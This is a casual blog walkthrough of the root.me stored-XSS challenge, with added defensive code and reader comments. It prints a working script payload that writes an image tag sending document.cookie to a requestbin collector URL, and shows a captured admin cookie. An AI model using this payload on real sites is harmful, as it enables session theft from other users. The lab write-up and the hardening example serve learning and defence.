root.me – Web/Client: XSS – Stored 1

Hello again, pepol

I’m alive and doing stuffs. Tis another task I have to post which no one probably will see but meh.


I got this challenge from a certain website, root.me. I’ll put it at the reference place becoz that particular place is hella cool that I want to write more stuffs.

First, it’s a stored XSS challenge so u kno what to do. Basically, you’ll get something by inputting some kind of JavaScript, but it won’t pop out on your own screen like the usual XSS, because it’s stored and runs when someone else (the admin here) opens the page.

Okay, first of all, since it’s stored, we need something to make those stored things show up on our screen. For that, I found requestbin. Do you know what that is? Haha, fool, me neither. Apparently that site will generate us some sort of link which will show us whatever requests get sent to it. I’ll show you later.

Okay, let’s generate that link.

 

 

Ye, ye. I’m not a robot. Click on that “Create a Requestbin” and move on.

That’s the link. Keep it and we’ll go to the next stage.

Okay, we get this comment posting page.

What we wanna do is input the classic document.cookie JavaScript but add our link.

Lemme help you. Copy-paste this: <script>document.write("<img src='your host url?="+document.cookie+"'></img>");</script>

In our case, I’ll go with <script>document.write("<img src='https://requestb.in/122lf8z1?="+document.cookie+"'></img>");</script>

Let’s input those stuffs.

Input something to the title.

Send it and we’ll see an icon of a corrupted image at the posted message section since we posted it as image before.

 

Ye, ye. Leaking solution on internet is forbidden. I have no choice. Forgive me, okay.

Okay let’s go back to requestbin.

See that pink circle next to our small link? Click that. We’ll go to this page:

woot!~ OMAGAD OMAGAD, WE GET THE ADMIN COOKIE HAHAHAHAHAHAHA

If you haven’t got it already, keep clicking on that pink circle. It will keep sending requests until we get the cookie. //nom nom

Let’s input.

Send

This is what satisfaction looks like

Reference: 
https://www.youtube.com/watch?v=tZcHyaMR3oc
http://winnierusli.blog.binusian.org/2018/03/02/what-the-heck-is-xss-stored/ 

Used     : 
https://requestb.in/

Challenge: 
https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stored-1

PS: I'm a noob. So sorry if I can't satisfy your confusion over things but feel free to ask.
I don't know if I'll be able to answer tho.
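
Why the cookie leaked, seen from the site's side. This is an added example, not part of the original post and not root-me's code: a hypothetical comment renderer that pastes stored fields in raw, next to one that encodes them on output, plus an HttpOnly session cookie and a CSP header. The function names and the collector.example host are assumptions made for illustration.

```javascript
// Added example: hypothetical comment-board code, not the challenge's real source.

// Encode the five characters that let text break out of HTML content or attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: stored fields go into the page as markup, so a stored <script>
// runs in the browser of everyone who views the comment, the admin included.
function renderCommentUnsafe(comment) {
  return '<div class="comment"><h3>' + comment.title + '</h3><p>' +
         comment.message + '</p></div>';
}

// Hardened: stored fields are encoded at output time and are shown as plain text.
function renderCommentSafe(comment) {
  return '<div class="comment"><h3>' + escapeHtml(comment.title) + '</h3><p>' +
         escapeHtml(comment.message) + '</p></div>';
}

// Second layer: an HttpOnly cookie is not visible to document.cookie, so a
// script that does get through has no session value to read.
function sessionCookieHeader(name, value) {
  return 'Set-Cookie: ' + name + '=' + encodeURIComponent(value) +
         '; HttpOnly; Secure; SameSite=Strict; Path=/';
}

// Third layer: this policy refuses inline <script> blocks and only loads
// images from the site's own origin, so the <img> request to another host is blocked.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'";

// Constructed sample: the comment from this write-up with a placeholder host.
const storedComment = {
  title: 'hi',
  message: '<script>document.write("<img src=\'https://collector.example/?="' +
           '+document.cookie+"\'></img>");</script>',
};

console.log(renderCommentUnsafe(storedComment)); // script tag survives as markup
console.log(renderCommentSafe(storedComment));   // script tag is inert text
console.log(sessionCookieHeader('session', 'constructed-value'));
console.log(CSP_HEADER);
```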

 

2 Comments


  1. thanks a lot man.. you are really nice.. thanks again


  2. Thanks for your solution, the best I have found. I was stuck at how to send the admin payload after getting it; I had researched XMLHttpRequest, but it didn’t work.
    At this moment, Requestbin may not work for me, so I use postb.in instead. I changed your payload a little bit because yours doesn’t work anymore – at least for me. I changed “?=” to “/”

    document.write(“”);

    I’m not going to post the script with the script tag, your server may filter it and you may not be able to read it. Here is the result: GET /KOszrLM1/ADMIN_COOKIE%3DNkI9qe4cdLIO2P7MIsWS8ofD6

    The funniest thing is root-me replies to requests slowly; sometimes I worry about my solution, did I make a mistake :v
